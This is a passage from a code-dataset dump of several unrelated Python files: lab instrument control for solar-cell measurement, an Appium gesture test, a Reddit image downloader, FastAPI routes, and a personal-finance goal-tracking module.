Connection.keithley()\n        keithley._init_(self.rm)\n        keithley.open_gpib(gpib_name)\n        self.keithley = keithley\n\n    def cnnct_pixelswitch(self,arduino_name):\n        pixelswitch = Connection.pixelswitch()\n        pixelswitch._init_(self.rm)\n        pixelswitch.open_pixelswitcher_connection(arduino_name)\n        self.pixelswitch = pixelswitch\n    \n    def cnnct_shutter(self,shutter_name):\n        shutter = Connection.shutter()\n        shutter._init_(self.rm)\n        shutter.open_shutter_connection(shutter_name)\n        self.shutter = shutter\n    \n    def connect(self,gpib_name=None, pixel_com_name=None, shutter_com_name=None):\n        if gpib_name is not None:\n            self.cnnct_keithley(gpib_name)\n        if pixel_com_name is not None:\n            self.cnnct_pixelswitch(pixel_com_name)\n        if shutter_com_name is not None:\n            self.cnnct_shutter(shutter_com_name)\n    \n\n    def get_voc(self):\n        self.keithley.voltage_sensing(self.cmpl_voltage,self.query_time)\n        self.keithley.inst_output_on()\n        self.shutter.shutter_open()\n        data = np.array(self.keithley.get_inst().read().split(','),dtype='float')\n        voc = data[0]\n        self.keithley.inst_output_off()\n        self.shutter.shutter_close()\n        print(data)\n        print('Voc is %f V'%voc)\n        
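# editor's note (assumption): the Keithley read string is comma-separated with\n        # voltage at index 0 and current at index 1; the same open-output/open-shutter,\n        # read, close pattern repeats in get_isc() below.\n        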
return voc\n\n    def get_isc(self):\n        self.keithley.current_sensing(self.cmpl_current,self.query_time)\n        self.keithley.inst_output_on()\n        self.shutter.shutter_open()\n        self.keithley.inst_set_source_volt_value(0)\n        data = np.array(self.keithley.get_inst().read().split(','),dtype='float')\n        isc = data[1]\n        self.keithley.inst_output_off()\n        self.shutter.shutter_close()\n        print(data)\n        print('Isc is %f A'%isc)\n        return isc\n\n    def voltage_sweep(self,volt_arr):\n        data = np.empty((volt_arr.size,3))\n        self.keithley.current_sensing(self.cmpl_current,self.query_time)\n        self.keithley.inst_output_on()\n        for index,_v in enumerate(volt_arr):\n            self.keithley.inst_set_source_volt_value(_v)\n            output = np.array(self.keithley.get_inst().read().split(','),dtype='float')\n            data[index,:] = np.array(output[:])\n        self.keithley.inst_output_off()\n        return data\n\n    def spo(self, vapp, time_length, time_interval, fid):  # added missing self parameter\n        start_time = time.time()\n        self.keithley.current_sensing(self.cmpl_current,self.query_time)\n        self.keithley.inst_output_on()\n        self.keithley.inst_set_source_volt_value(vapp)\n        while (time.time() - start_time) < time_length:\n            output = np.array(self.keithley.get_inst().read().split(','),dtype='float')\n            fid.write(','.join(map(str, output)) + '\\n')  # ndarray must be converted to text before writing\n            time.sleep(time_interval)\n        self.keithley.inst_output_off()\n\n\n\n\n","repo_name":"grace227/JvQt","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"38346497905","text":"from time import sleep\n\nfrom appium import webdriver\nfrom appium.webdriver.common.touch_action import TouchAction\n\n\nclass TestTouchAction():\n    def setup(self):\n        desired_caps = {}\n        desired_caps['platformName'] = 'Android'\n        desired_caps['platformVersion'] = '6.0'\n        desired_caps['deviceName'] = 'emulator-5554'\n        desired_caps['appPackage'] = 'cn.kmob.screenfingermovelock'\n        desired_caps['appActivity'] = 'com.samsung.ui.MainActivity'\n        desired_caps['noReset'] = True\n        # desired_caps['dontStopAppOnReset'] = True  setting this to true keeps the app running and continues on the current page instead of relaunching, but it seems problematic here: it reports that the Xueqiu app cannot be started\n        desired_caps['skipDeviceInitialization'] = True\n        desired_caps['unicodeKeyBoard'] = 'true' # needed when typing Chinese search terms, though it seems to work without it too\n        desired_caps['resetKeyBoard'] = 'true'\n        self.driver = webdriver.Remote(\"http://localhost:4723/wd/hub\", desired_caps)\n        self.driver.implicitly_wait(5)\n\n    def teardown(self):\n        sleep(3)\n        self.driver.quit()\n\n    #\n    def test_touchaction_unlock(self):\n        action = TouchAction(self.driver)\n        action.press(x=120,y=172).wait(200).move_to(x=364,y=179).wait(200).move_to(x=599,y=174).wait(200)\\\n            .move_to(x=599,y=417).wait(200).move_to(x=601,y=654).release().perform()","repo_name":"mengMia/Hogwarts","sub_path":"PythonCode/App9/test_app6_2.py","file_name":"test_app6_2.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"10083407530","text":"import requests\nimport os\nfrom os import path\nimport bs4\n\n\n# the url and file path are currently just for testing this works, will be changed next\ndef download_image(url, subreddit, title, count):\n    # get extension from url (gif,mp4,jpg) and turn imgur and gfycat gifs into the proper format\n    url, file_extension = url_handler(url)\n\n    # set directory for images to be saved, desktop location is temporary\n    file_path = path.join('C:\\\\Users\\\\Peter\\\\Desktop\\\\', subreddit)\n\n    # creates file path using subreddit, if it doesn't already exist\n    try:\n        
os.makedirs(file_path)\n    except FileExistsError:\n        pass\n\n    # go to url and save the file to the file path\n    response = requests.get(url)\n    try:\n        # if there is an invalid response code then an exception is raised (ex: 404 code)\n        response.raise_for_status()\n        # save file, title of the file is top post order, title is saved in a file below\n        with open(file_path + \"\\\\\" + str(count) + \".\" + file_extension, 'wb') as f:\n            f.write(response.content)\n        print(\"Successful download!\")\n        # saves the title of the post for uploading on imgur\n        with open(file_path + \"\\\\titles.txt\", 'a') as f:\n            f.write(title + \"\\n\")\n\n    except requests.exceptions.HTTPError as e:\n        print(str(e))\n    except FileNotFoundError:\n        print(\"Directory does not exist\")\n\n\ndef url_handler(url):\n    # splits url to get file extension\n    file_extension = \"\"\n    url = fetch_image_url(url)\n\n    # sets file extension to whatever is after the last '.' (so blahblah.com/blah.jpg the .jpg part)\n    try:\n        url_split = url.split('.')\n        file_extension = url_split[-1]\n\n    except UnboundLocalError:\n        print(\"Unsupported url: \" + url)\n\n    return url, file_extension\n\n\ndef fetch_image_url(url):\n    # technically gifv and mp4 aren't supported now. But this function might be completely reworked later, so it stays\n    supported_formats = (\".gif\", \".gifv\", \".png\", \".jpg\", \".mp4\")\n\n    # checks if the url is to the source image or not, if not it finds the source image\n    if not url.endswith(supported_formats):\n        response = requests.get(url).content\n        soup = bs4.BeautifulSoup(response, \"html.parser\")\n        url_split_slash = url.split('/')\n\n        # loops through all image sources in HTML and sets the correct image url\n        images = soup.findAll('img')\n        for image in images:\n            # imgur links in the HTML are missing the http: so don't remove this\n            if \"imgur\" in image['src']:\n                url = \"http:\" + image['src']\n            # this statement looks for matching url endings between the source and the container url\n            # ex) The container url: 'http://www.livememe.com/apbp6e9'. 
The ending: 'apbp6e9'\n            elif url_split_slash[-1] in image['src']:\n                url = image['src']\n            else:\n                continue\n    return url\n","repo_name":"PeterMorrison1/RedditBot","sub_path":"imagehandler.py","file_name":"imagehandler.py","file_ext":"py","file_size_in_byte":2944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"2436380505","text":"from fastapi import Depends, APIRouter, status\n\nfrom .services import SrvLeadership\nfrom api.schemas import Leadership, LeaderChange\nfrom api.specification import SessionID\n\nrouter = APIRouter(prefix='/leadership', tags=['leadership'])\n\n\n@router.post('', response_model=Leadership, status_code=status.HTTP_201_CREATED)\nasync def leadership(\n    leadership: Leadership | LeaderChange,\n    service: SrvLeadership = Depends()\n):\n    return await service.post(leadership)\n\n\n@router.get('/{session_id}', response_model=Leadership)\nasync def session_leader(\n    session_id: SessionID = Depends(),\n    service: SrvLeadership = Depends()\n):\n    return await service.get(session_id)\n\n\n@router.get('/hist/{session_id}', response_model=list[Leadership])\nasync def leadership_history(  # renamed to avoid redefining the 'leadership' handler above\n    session_id: SessionID = Depends(),\n    service: SrvLeadership = Depends()\n):\n    return await service.history(session_id)\n","repo_name":"Ramzes377/Thrower","sub_path":"api/leadership/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"35733353897","text":"from ppf.models import Ppf, PpfEntry\nfrom ssy.models import Ssy, SsyEntry\nfrom fixed_deposit.models import FixedDeposit\nfrom fixed_deposit.fixed_deposit_helper import get_maturity_value\nfrom espp.models import Espp, EsppSellTransactions\nfrom rsu.models import RSUAward, RestrictedStockUnits, RSUSellTransactions\nfrom epf.models import Epf, EpfEntry\nfrom goal.models import Goal\nfrom shares.models import Share, Transactions\nfrom users.models import User\nimport datetime\nfrom dateutil.relativedelta import relativedelta\nfrom common.models import HistoricalStockPrice, Stock, MutualFund\nfrom shared.handle_real_time_data import get_conversion_rate, get_historical_stock_price, get_historical_mf_nav, get_historical_stock_price_based_on_symbol, get_in_preferred_currency\nfrom shared.handle_create import add_common_stock\nfrom mutualfunds.models import Folio, MutualFundTransaction\nfrom shared.financial import xirr\nfrom retirement_401k.helper import get_401k_amount_for_goal, get_r401k_value_as_on\nfrom shared.utils import get_min\nfrom epf.epf_interface import EpfInterface\nfrom espp.espp_interface import EsppInterface\nfrom fixed_deposit.fd_interface import FdInterface\nfrom ppf.ppf_interface import PpfInterface\nfrom ssy.ssy_interface import SsyInterface\nfrom shares.share_interface import ShareInterface\nfrom mutualfunds.mf_interface import MfInterface\nfrom retirement_401k.r401k_interface import R401KInterface\nfrom rsu.rsu_interface import RsuInterface\nfrom insurance.insurance_interface import InsuranceInterface\nfrom gold.gold_interface import GoldInterface\nfrom bankaccounts.bank_account_interface import BankAccountInterface\nfrom crypto.crypto_interface import CryptoInterface\nfrom shared.handle_get import get_goal_name_from_id\n\n\ndef get_ppf_amount_for_goal(id):\n    ppf_objs = Ppf.objects.filter(goal=id)\n    total_ppf = 0\n    for ppf_obj in ppf_objs:\n        ppf_num = ppf_obj.number\n        amt = 0\n        ppf_trans = PpfEntry.objects.filter(number=ppf_num)\n        for entry in 
ppf_trans:\n            if entry.entry_type.lower() == 'cr' or entry.entry_type.lower() == 'credit':\n                amt += entry.amount\n            else:\n                amt -= entry.amount\n        if amt < 0:\n            amt = 0\n        total_ppf += amt\n    return total_ppf\n\ndef get_ssy_amount_for_goal(id):\n    ssy_objs = Ssy.objects.filter(goal=id)\n    total_ssy = 0\n    for ssy_obj in ssy_objs:\n        ssy_num = ssy_obj.number\n        amt = 0\n        ssy_trans = SsyEntry.objects.filter(number=ssy_num)\n        for entry in ssy_trans:\n            if entry.entry_type.lower() == 'cr' or entry.entry_type.lower() == 'credit':\n                amt += entry.amount\n            else:\n                amt -= entry.amount\n        if amt < 0:\n            amt = 0\n        total_ssy += amt\n    return total_ssy\n\ndef get_fd_amount_for_goal(id):\n    fd_objs = FixedDeposit.objects.filter(goal=id)\n    total_fd = 0\n    for fd_obj in fd_objs:\n        total_fd += fd_obj.final_val\n    return total_fd\n\ndef get_espp_amount_for_goal(id):\n    espp_objs = Espp.objects.filter(goal=id)\n    total_espp = 0\n    for espp_obj in espp_objs:\n        if espp_obj.latest_value:\n            total_espp += espp_obj.latest_value\n    return total_espp\n\ndef get_rsu_amount_for_goal(id):\n    award_objs = RSUAward.objects.filter(goal=id)\n    total_rsu = 0\n    for award_obj in award_objs:\n        for rsu_obj in RestrictedStockUnits.objects.filter(award=award_obj):\n            if rsu_obj.latest_value:\n                total_rsu += rsu_obj.latest_value\n    return total_rsu\n\ndef get_shares_amount_for_goal(id):\n    share_objs = Share.objects.filter(goal=id)\n    total_shares = 0\n    for share_obj in share_objs:\n        if share_obj.latest_value:\n            total_shares += share_obj.latest_value\n    return total_shares\n\ndef get_mf_amount_for_goal(id):\n    folio_objs = Folio.objects.filter(goal=id)\n    total = 0\n    for folio_obj in folio_objs:\n        if folio_obj.latest_value:\n            total += folio_obj.latest_value\n    return total\n\ndef get_epf_amount_for_goal(id):\n    epf_objs = Epf.objects.filter(goal=id)\n    total_epf = 0\n    for epf_obj in epf_objs:\n        epf_id = epf_obj.id\n        amt = 0\n        epf_trans = EpfEntry.objects.filter(epf_id=epf_id)\n        for entry in epf_trans:\n            amt += entry.employee_contribution + entry.employer_contribution + entry.interest_contribution\n            amt -= entry.withdrawl\n        if amt < 0:\n            amt = 0\n        total_epf += amt\n    return total_epf\n\ndef get_goal_contributions(goal_id):\n    goal_name = get_goal_name_from_id(goal_id)\n    print(f\"inside get_goal_contributions {goal_id} {goal_name}\")\n    contrib = dict()\n    contrib['epf'] = int(get_epf_amount_for_goal(goal_id))\n    contrib['espp'] = int(get_espp_amount_for_goal(goal_id))\n    contrib['fd'] = int(get_fd_amount_for_goal(goal_id))\n    contrib['ppf'] = int(get_ppf_amount_for_goal(goal_id))\n    contrib['ssy'] = int(get_ssy_amount_for_goal(goal_id))\n    contrib['rsu'] = int(get_rsu_amount_for_goal(goal_id))\n    contrib['shares'] = int(get_shares_amount_for_goal(goal_id))\n    contrib['mf'] = int(get_mf_amount_for_goal(goal_id))\n    \n    contrib['equity'] = contrib['espp']+contrib['rsu']+contrib['shares']+contrib['mf']\n    contrib['debt'] = contrib['epf'] + contrib['fd'] + contrib['ppf'] + contrib['ssy']\n    contrib['distrib_labels'] = ['EPF','ESPP','FD','PPF','SSY','RSU','Shares','MutualFunds']\n    contrib['distrib_vals'] = [contrib['epf'],contrib['espp'],contrib['fd'],contrib['ppf'],contrib['ssy'],contrib['rsu'],contrib['shares'],contrib['mf']]\n    contrib['distrib_colors'] = ['#f15664', '#DC7633','#006f75','#92993c','#f9c5c6','#AA12E8','#e31219','#bfff00']\n\n    contrib['401k'] = int(get_401k_amount_for_goal(goal_id))\n    if contrib['401k'] > 0:\n        contrib['distrib_labels'].append('401K')\n        contrib['distrib_vals'].append(contrib['401k'])\n        contrib['distrib_colors'].append('#617688')\n        contrib['equity'] += 
contrib['401k']\n\n contrib['insurance'] = int(InsuranceInterface.get_amount_for_goal(goal_id))\n if contrib['insurance'] > 0:\n contrib['distrib_labels'].append('Insurance')\n contrib['distrib_vals'].append(contrib['insurance'])\n contrib['distrib_colors'].append('#ede76d')\n contrib['equity'] += contrib['insurance']\n\n contrib['gold'] = int(GoldInterface.get_amount_for_goal(goal_id))\n if contrib['gold'] > 0:\n contrib['distrib_labels'].append('Gold')\n contrib['distrib_vals'].append(contrib['gold'])\n contrib['distrib_colors'].append('#ffd700')\n \n contrib['cash'] = int(BankAccountInterface.get_amount_for_goal(goal_id))\n if contrib['cash'] > 0:\n contrib['distrib_labels'].append('Cash')\n contrib['distrib_vals'].append(contrib['cash'])\n contrib['distrib_colors'].append(BankAccountInterface.get_chart_color())\n \n contrib['crypto'] = int(CryptoInterface.get_amount_for_goal(goal_id))\n if contrib['crypto'] > 0:\n contrib['distrib_labels'].append('Crypto')\n contrib['distrib_vals'].append(contrib['crypto'])\n contrib['distrib_colors'].append(CryptoInterface.get_chart_color())\n\n contrib['total'] = contrib['equity'] + contrib['debt'] + contrib['gold'] + contrib['cash']\n\n print(\"contrib:\", contrib)\n return contrib\n\n#port: portfolioval\n#contrib: contribution \n#deduct: deduction\ndef add_or_create(year, key, contrib_obj, deduct_obj, port_obj, contrib, deduct, port):\n if year not in contrib_obj:\n contrib_obj[year] = dict()\n port_obj[year] = dict()\n deduct_obj[year] = dict()\n if contrib:\n contrib_obj[year][key] = float(contrib) + contrib_obj[year].get(key, 0)\n if port:\n port_obj[year][key] = float(port) + port_obj[year].get(key, 0)\n if deduct: \n deduct_obj[year][key] = float(deduct) + deduct_obj[year].get(key, 0)\n\n\ndef get_goal_yearly_contrib_v2(goal_id, expected_return, format='%Y-%m-%d'):\n start_day = datetime.date.today()\n start_day = get_min(EpfInterface.get_start_day_for_goal(goal_id), start_day)\n start_day = get_min(EsppInterface.get_start_day_for_goal(goal_id), start_day)\n start_day = get_min(FdInterface.get_start_day_for_goal(goal_id), start_day)\n start_day = get_min(MfInterface.get_start_day_for_goal(goal_id), start_day)\n start_day = get_min(PpfInterface.get_start_day_for_goal(goal_id), start_day)\n start_day = get_min(SsyInterface.get_start_day_for_goal(goal_id), start_day)\n start_day = get_min(ShareInterface.get_start_day_for_goal(goal_id), start_day)\n start_day = get_min(R401KInterface.get_start_day_for_goal(goal_id), start_day)\n start_day = get_min(RsuInterface.get_start_day_for_goal(goal_id), start_day)\n start_day = get_min(InsuranceInterface.get_start_day_for_goal(goal_id), start_day)\n start_day = get_min(GoldInterface.get_start_day_for_goal(goal_id), start_day)\n start_day = get_min(BankAccountInterface.get_start_day_for_goal(goal_id), start_day)\n start_day = get_min(CryptoInterface.get_start_day_for_goal(goal_id), start_day)\n \n contrib = dict()\n total = dict()\n deduct = dict()\n cash_flows = list()\n latest_value = 0\n total_contrib = 0\n # Deduction is a -ve number\n total_deduct = 0\n\n curr_yr = datetime.date.today().year\n print_all = False\n\n for yr in range(start_day.year, curr_yr+1):\n print(f'*** {yr} ***')\n cf, c, d, t = PpfInterface.get_goal_yearly_contrib(goal_id, yr)\n if len(cf) > 0 or c+d+t != 0:\n add_or_create(yr, 'PPF', contrib, deduct, total, c, d, t)\n cash_flows.extend(cf)\n latest_value += float(t) if yr == curr_yr else 0\n total_contrib += float(c)\n total_deduct += float(d)\n if print_all or yr == curr_yr:\n 
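# editor's note: t is this asset's value for the year; only the current\n                # year's value rolls into latest_value, while c and d accumulate\n                # contributions and deductions for the cash-flow (XIRR) list.\n                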
print(f'after adding Ppf {t} latest_value is {latest_value}')\n\n\n cf, c, d, t = EpfInterface.get_goal_yearly_contrib(goal_id, yr)\n if len(cf) > 0 or c+d+t != 0:\n add_or_create(yr, 'EPF', contrib, deduct, total, c, d, t)\n cash_flows.extend(cf)\n latest_value += float(t) if yr == curr_yr else 0\n total_contrib += float(c)\n total_deduct += float(d)\n if print_all or yr == curr_yr:\n print(f'after adding Epf {t} latest_value is {latest_value}')\n\n cf, c, d, t = SsyInterface.get_goal_yearly_contrib(goal_id, yr)\n if len(cf) > 0 or c+d+t != 0:\n add_or_create(yr, 'SSY', contrib, deduct, total, c, d, t)\n cash_flows.extend(cf)\n latest_value += float(t) if yr == curr_yr else 0\n total_contrib += float(c)\n total_deduct += float(d)\n if print_all or yr == curr_yr:\n print(f'after adding Ssy {t} latest_value is {latest_value}')\n\n cf, c, d, t = MfInterface.get_goal_yearly_contrib(goal_id, yr)\n if len(cf) > 0 or c+d+t != 0:\n add_or_create(yr, 'MutualFunds', contrib, deduct, total, c, d, t)\n cash_flows.extend(cf)\n latest_value += float(t) if yr == curr_yr else 0\n total_contrib += float(c)\n total_deduct += float(d)\n if print_all or yr == curr_yr:\n print(f'after adding Mf {t} latest_value is {latest_value}')\n\n cf, c, d, t = EsppInterface.get_goal_yearly_contrib(goal_id, yr)\n if len(cf) > 0 or c+d+t != 0:\n add_or_create(yr, 'ESPP', contrib, deduct, total, c, d, t)\n cash_flows.extend(cf)\n latest_value += float(t) if yr == curr_yr else 0\n total_contrib += float(c)\n total_deduct += float(d)\n if print_all or yr == curr_yr:\n print(f'after adding Espp {t} latest_value is {latest_value}')\n\n cf, c, d, t = FdInterface.get_goal_yearly_contrib(goal_id, yr)\n if len(cf) > 0 or c+d+t != 0:\n add_or_create(yr, 'FD', contrib, deduct, total, c, d, t)\n cash_flows.extend(cf)\n latest_value += float(t) if yr == curr_yr else 0\n total_contrib += float(c)\n total_deduct += float(d)\n if print_all or yr == curr_yr:\n print(f'after adding FD {t} latest_value is {latest_value}')\n\n cf, c, d, t = ShareInterface.get_goal_yearly_contrib(goal_id, yr)\n if len(cf) > 0 or c+d+t != 0:\n add_or_create(yr, 'Shares', contrib, deduct, total, c, d, t)\n cash_flows.extend(cf)\n latest_value += float(t) if yr == curr_yr else 0\n total_contrib += float(c)\n total_deduct += float(d)\n if print_all or yr == curr_yr:\n print(f'after adding shares {t} latest_value is {latest_value}')\n \n cf, c, d, t = RsuInterface.get_goal_yearly_contrib(goal_id, yr)\n if len(cf) > 0 or c+d+t != 0:\n add_or_create(yr, 'RSU', contrib, deduct, total, c, d, t)\n cash_flows.extend(cf)\n latest_value += float(t) if yr == curr_yr else 0\n total_contrib += float(c)\n total_deduct += float(d)\n if print_all or yr == curr_yr:\n print(f'after adding RSU {t} latest_value is {latest_value}')\n \n cf, c, d, t = InsuranceInterface.get_goal_yearly_contrib(goal_id, yr)\n if len(cf) > 0 or c+d+t != 0:\n add_or_create(yr, 'Insurance', contrib, deduct, total, c, d, t)\n cash_flows.extend(cf)\n latest_value += float(t) if yr == curr_yr else 0\n total_contrib += float(c)\n total_deduct += float(d)\n if print_all or yr == curr_yr:\n print(f'after adding Insurance {t} latest_value is {latest_value}')\n\n cf, c, d, t = R401KInterface.get_goal_yearly_contrib(goal_id, yr)\n if len(cf) > 0 or c+d+t != 0:\n add_or_create(yr, '401K', contrib, deduct, total, c, d, t)\n cash_flows.extend(cf)\n latest_value += float(t) if yr == curr_yr else 0\n total_contrib += float(c)\n total_deduct += float(d)\n if print_all or yr == curr_yr:\n print(f'after adding 401K {t} 
latest_value is {latest_value}')\n\n cf, c, d, t = GoldInterface.get_goal_yearly_contrib(goal_id, yr)\n if len(cf) > 0 or c+d+t != 0:\n add_or_create(yr, 'Gold', contrib, deduct, total, c, d, t)\n cash_flows.extend(cf)\n latest_value += float(t) if yr == curr_yr else 0\n total_contrib += float(c)\n total_deduct += float(d)\n if print_all or yr == curr_yr:\n print(f'after adding gold {t} latest_value is {latest_value}')\n\n cf, c, d, t = BankAccountInterface.get_goal_yearly_contrib(goal_id, yr)\n if len(cf) > 0 or c+d+t != 0:\n add_or_create(yr, 'Cash', contrib, deduct, total, c, d, t)\n cash_flows.extend(cf)\n latest_value += float(t) if yr == curr_yr else 0\n total_contrib += float(c)\n total_deduct += float(d)\n if print_all or yr == curr_yr:\n print(f'after adding cash {t} latest_value is {latest_value}')\n \n cf, c, d, t = CryptoInterface.get_goal_yearly_contrib(goal_id, yr)\n if len(cf) > 0 or c+d+t != 0:\n add_or_create(yr, 'Crypto', contrib, deduct, total, c, d, t)\n cash_flows.extend(cf)\n latest_value += float(t) if yr == curr_yr else 0\n total_contrib += float(c)\n total_deduct += float(d)\n if print_all or yr == curr_yr:\n print(f'after adding crypto {t} latest_value is {latest_value}')\n\n if yr not in contrib:\n contrib[yr] = dict()\n if yr not in deduct:\n deduct[yr] = dict()\n if yr not in total:\n total[yr] = dict()\n\n print(f'total_contrib {total_contrib} total_deduct {total_deduct} latest_value {latest_value}')\n if len(cash_flows) > 0 and latest_value != 0:\n cash_flows.append((datetime.date.today(), latest_value))\n cash_flows = sort_set(cash_flows)\n return contrib, deduct, total, latest_value, cash_flows\n\n\ndef get_goal_yearly_contrib(goal_id, expected_return, format='%Y-%m-%d'):\n if expected_return:\n expected_return = int(expected_return)\n print(f\"inside get_goal_yearly_contrib {goal_id} {expected_return}\")\n\n ret = dict()\n curr_yr = datetime.datetime.now().year\n\n '''\n contrib = dict()\n total = dict()\n deduct = dict()\n cash_flows = list()\n for ppf_obj in Ppf.objects.filter(goal=goal_id):\n for ppf_trans in PpfEntry.objects.filter(number=ppf_obj):\n #entry_date = (datetime.date(ppf_trans.year + (ppf_trans.month == 12), \n # (ppf_trans.month + 1 if ppf_trans.month < 12 else 1), 1) - datetime.timedelta(1)).strftime(format)\n if ppf_trans.interest_component:\n if ppf_trans.entry_type == 'CR':\n add_or_create(ppf_trans.trans_date.year, 'PPF', contrib, deduct, total, 0, 0, ppf_trans.amount)\n else:\n add_or_create(ppf_trans.trans_date.year, 'PPF', contrib, deduct, total, 0, 0, -1*ppf_trans.amount)\n cash_flows.append((ppf_trans.trans_date, float(ppf_trans.amount)))\n else:\n if ppf_trans.entry_type == 'CR':\n add_or_create(ppf_trans.trans_date.year, 'PPF', contrib, deduct, total, ppf_trans.amount, 0, ppf_trans.amount)\n cash_flows.append((ppf_trans.trans_date, -1*float(ppf_trans.amount)))\n else:\n add_or_create(ppf_trans.trans_date.year, 'PPF', contrib, deduct, total, 0, -1*ppf_trans.amount, -1*ppf_trans.amount)\n cash_flows.append((ppf_trans.trans_date, float(ppf_trans.amount)))\n \n for epf_obj in Epf.objects.filter(goal=goal_id):\n for epf_trans in EpfEntry.objects.filter(epf_id=epf_obj):\n #entry_date = (datetime.date(epf_trans.year + (epf_trans.month == 12), \n # (epf_trans.month + 1 if epf_trans.month < 12 else 1), 1) - datetime.timedelta(1)).strftime(format)\n add_or_create(epf_trans.trans_date.year, 'EPF', contrib, deduct, total, epf_trans.employer_contribution + epf_trans.employee_contribution, epf_trans.withdrawl, epf_trans.employer_contribution 
+ epf_trans.employee_contribution+ epf_trans.interest_contribution-epf_trans.withdrawl)\n cash_flows.append((epf_trans.trans_date, -1*float(epf_trans.employer_contribution+ epf_trans.employee_contribution)))\n if epf_trans.withdrawl and epf_trans.withdrawl > 0:\n cash_flows.append((epf_trans.trans_date, float(epf_trans.withdrawl)))\n\n for ssy_obj in Ssy.objects.filter(goal=goal_id):\n for ssy_trans in SsyEntry.objects.filter(number=ssy_obj):\n if ssy_trans.interest_component:\n if ssy_trans.entry_type == 'CR':\n add_or_create(ssy_trans.trans_date.year, 'SSY', contrib, deduct, total, 0, 0, ssy_trans.amount)\n else:\n add_or_create(ssy_trans.trans_date.year, 'SSY', contrib, deduct, total, 0, 0, -1*ssy_trans.amount)\n cash_flows.append((ssy_trans.trans_date, float(ssy_trans.amount)))\n else:\n if ssy_trans.entry_type == 'CR':\n add_or_create(ssy_trans.trans_date.year, 'SSY', contrib, deduct, total, ssy_trans.amount, 0, ssy_trans.amount)\n cash_flows.append((ssy_trans.trans_date, -1*float(ssy_trans.amount)))\n else:\n add_or_create(ssy_trans.trans_date.year, 'SSY', contrib, deduct, total, 0, -1*ssy_trans.amount, -1*ssy_trans.amount)\n cash_flows.append((ssy_trans.trans_date, float(ssy_trans.amount)))\n \n for espp_obj in Espp.objects.filter(goal=goal_id):\n add_or_create(espp_obj.purchase_date.year, 'ESPP', contrib, deduct, total, espp_obj.total_purchase_price, 0, 0)\n end_year = datetime.datetime.now().year\n for st in EsppSellTransactions.objects.filter(espp=espp_obj):\n add_or_create(st.trans_date.year, 'ESPP', contrib, deduct, total, 0, -1*st.trans_price, 0)\n cash_flows.append((st.trans_date, float(st.trans_price)))\n cash_flows.append((espp_obj.purchase_date, -1*float(espp_obj.total_purchase_price)))\n for i in range (espp_obj.purchase_date.year, end_year+1):\n year_end_value = 0\n end_date = datetime.datetime.now()\n if i != datetime.datetime.now().year:\n end_date = datetime.datetime.strptime(str(i)+'-12-31', '%Y-%m-%d').date()\n units = espp_obj.shares_purchased\n for st in EsppSellTransactions.objects.filter(espp=espp_obj, trans_date__lte=end_date):\n units -= st.units\n \n if units > 0:\n year_end_value_vals = get_historical_stock_price_based_on_symbol(espp_obj.symbol, espp_obj.exchange, end_date+relativedelta(days=-5), end_date)\n if year_end_value_vals:\n conv_rate = 1\n if espp_obj.exchange == 'NASDAQ' or espp_obj.exchange == 'NYSE':\n conv_val = get_conversion_rate('USD', 'INR', end_date)\n if conv_val:\n conv_rate = conv_val\n for k,v in year_end_value_vals.items():\n year_end_value = float(v)*float(conv_rate)*float(units)\n break\n print(f'espp year_end_value {i} {year_end_value}')\n\n add_or_create(i, 'ESPP', contrib, deduct, total, 0, 0, year_end_value)\n\n year_end_mf = dict()\n\n try:\n for folio_obj in Folio.objects.filter(goal=goal_id):\n for trans in MutualFundTransaction.objects.filter(folio=folio_obj):\n trans_yr = trans.trans_date.year\n \n for yr in range(trans_yr,datetime.datetime.now().year+1,1):\n if yr not in year_end_mf:\n year_end_mf[yr] = dict()\n if folio_obj.fund.code not in year_end_mf[yr]:\n year_end_mf[yr][folio_obj.fund.code] = 0\n if trans.trans_type == 'Buy' and not trans.switch_trans:\n add_or_create(trans.trans_date.year, 'MutualFunds',contrib, deduct, total,trans.trans_price,0,0)\n cash_flows.append((trans.trans_date, -1*float(trans.trans_price)))\n for yr in range(trans_yr,datetime.datetime.now().year+1,1):\n year_end_mf[yr][folio_obj.fund.code] = year_end_mf[yr][folio_obj.fund.code]+trans.units\n elif trans.trans_type == 'Sell' and not 
trans.switch_trans:\n add_or_create(trans.trans_date.year, 'MutualFunds',contrib, deduct, total,0, -1*trans.trans_price,0)\n cash_flows.append((trans.trans_date, float(trans.trans_price)))\n for yr in range(trans_yr,datetime.datetime.now().year+1,1):\n year_end_mf[yr][folio_obj.fund.code] = year_end_mf[yr][folio_obj.fund.code]-trans.units\n except Exception as ex:\n print(ex)\n print('year_end_mf', year_end_mf)\n for yr,_ in year_end_mf.items():\n print('yr',yr)\n yr_data = year_end_mf[yr]\n end_date = datetime.datetime.now()\n if yr != datetime.datetime.now().year:\n end_date = datetime.datetime.strptime(str(yr)+'-12-31', '%Y-%m-%d').date()\n print('yr_data', yr_data)\n for code,qty in yr_data.items():\n historical_mf_prices = get_historical_mf_nav(code, end_date+relativedelta(days=-5), end_date)\n if len(historical_mf_prices) > 0:\n print('historical_mf_prices',historical_mf_prices)\n for k,v in historical_mf_prices[0].items():\n add_or_create(yr, 'MutualFunds',contrib, deduct, total,0,0,v*qty)\n \n \n if len(contrib.keys()):\n for i in range (curr_yr, min(contrib.keys())-1, -1):\n print('i:', i)\n if i not in total:\n total[i] = dict()\n for j in range(i-1, min(contrib.keys())-1, -1):\n if j not in total:\n total[j] = dict()\n print('j:', j)\n total[i]['PPF'] = total[i].get('PPF', 0) + total[j].get('PPF', 0)\n total[i]['EPF'] = total[i].get('EPF', 0) + total[j].get('EPF', 0)\n total[i]['SSY'] = total[i].get('SSY', 0) + total[j].get('SSY', 0)\n '''\n \n contrib, deduct, total, latest_value, cash_flows = get_goal_yearly_contrib_v2(goal_id, expected_return)\n\n total_contribution = 0\n total_years = 0\n last_yr_contrib = 0\n if len(contrib.keys()):\n for yr in range(curr_yr, min(contrib.keys())-1, -1):\n total_years += 1\n if yr in contrib:\n for _,amt in contrib[yr].items():\n total_contribution += amt\n if yr == 